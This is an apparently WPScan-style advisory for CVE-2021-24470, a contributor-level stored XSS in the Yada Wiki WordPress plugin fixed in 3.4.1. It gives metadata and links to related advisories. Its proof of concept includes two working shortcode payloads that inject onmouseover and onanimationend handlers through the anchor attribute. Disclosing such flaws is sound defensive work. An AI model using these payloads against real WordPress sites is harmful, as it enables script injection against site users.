Yada Wiki < 3.4.1 – Contributor+ Stored XSS | CVE 2021-24470 | Plugin Vulnerabilities

Description

The plugin did not sanitise, validate or escape the anchor attribute of its shortcode, leading to a Stored Cross-Site Scripting issue

Proof of Concept

- Create a wiki page. If there is already a page, you can skip. The page can be a draft.
- Add this shortcode to a post/page, view it and move the mouse over the 'XSS' link to trigger the XSS [yadawiki link="PAGE_NAME_HERE" anchor='" onmouseover="alert(/XSS/)' show="xss"]

If the theme used is TwentyTwentyOne, the following payload can be used: [yadawiki link="PAGE_NAME_HERE" anchor='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)' show="xss"]

Affects Plugins

Fixed in 3.4.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

b01a85cc-0e45-4183-a916-19476354d5d4

Timeline

Publicly Published

2021-06-28 (about 4 years ago)

Added

2021-06-28 (about 4 years ago)

Last Updated

2022-01-02 (about 3 years ago)

Other

Published

Title

Published

2024-01-17

Title

BP Profile Search < 5.6 - Reflected Cross-Site Scripting via BPS_FORM

Published

2025-07-22

Title

Elite Video Player < 10.0.7 - Reflected Cross-Site Scripting

Published

2024-07-11

Title

WP Total Branding < 1.3 - Authenticated (Administrator+) Stored Cross-Site Scripting via title Parameter

Published

2024-03-15

Title

Elementor Addon Elements < 1.12.11 - Contributor+ Stored XSS

Published

2024-04-15

Title

LH Add Media From Url < 1.23 - Reflected Cross-Site Scripting